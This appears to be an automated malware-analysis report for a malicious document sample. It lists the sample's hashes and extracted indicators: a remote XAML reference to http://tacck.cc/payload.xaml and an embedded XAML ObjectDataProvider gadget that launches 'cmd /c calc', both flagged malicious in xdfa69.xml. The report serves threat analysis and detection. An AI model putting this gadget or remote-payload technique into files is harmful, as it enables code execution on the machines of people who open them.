|
Hash | Hash Value |
|---|---|
| MD5 | 007bbd422194fd23d021e69590438e63
|
| Sha1 | 7e87cda00ed0c70253cd92e7243b42125d5126da
|
| Sha256 | d148bcba96223653e0085699a3b34ce3a4dc43cdab1f2fe1487b7c76f3becf5e
|
| Sha384 | 7cd9c0789d7424d8198238ca4e854a52d5accf3773e3e0d5ef56967bc1100ee6d947dcf7ce9989c1b62501c98cf9177b
|
| Sha512 | 40dd81d9e9cbc63a490b88a2b468121a28fd1068a24227cc885c576022aac56c05e0942fa229ef3f466bbf755b738ce27650adc7f277bb62acbbdf4849837ae2
|
| SSDeep | 24:yr4+4hSP+y/3oCWXWpWFbnWqnWr3o0w4+QO3:U+dy/3SG41WqWr3v2Q4
|
| TLSH | F801BDD9469E6C10D8F989437AF0E407EC420157A6CAE294B4DC834F6F69980A007AF3
|
|
Config. Field0 | Value |
|---|---|
| Command | cmd |
| Arguments | /c calc |
|
Name0 | Value |
|---|---|
| Remote XAML Reference | http://tacck.cc/payload.xaml |
| XAML Embedded ObjectDataProvider | <ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> |
|
Config. Field0 | Value |
|---|---|
| Command | cmd |
| Arguments | /c calc |
|
Name0 | Value | Location |
|---|---|---|
| Remote XAML Reference | http://tacck.cc/payload.xaml Malicious |
xdfa69.xml |
| XAML Embedded ObjectDataProvider | <ObjectDataProvider MethodName="Start" x:Key="" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"><ObjectDataProvider.ObjectInstance><sd:Process xmlns:sd="clr-namespace:System.Diagnostics;assembly=System"><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="/c calc" FileName="cmd" /></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> Malicious |
xdfa69.xml |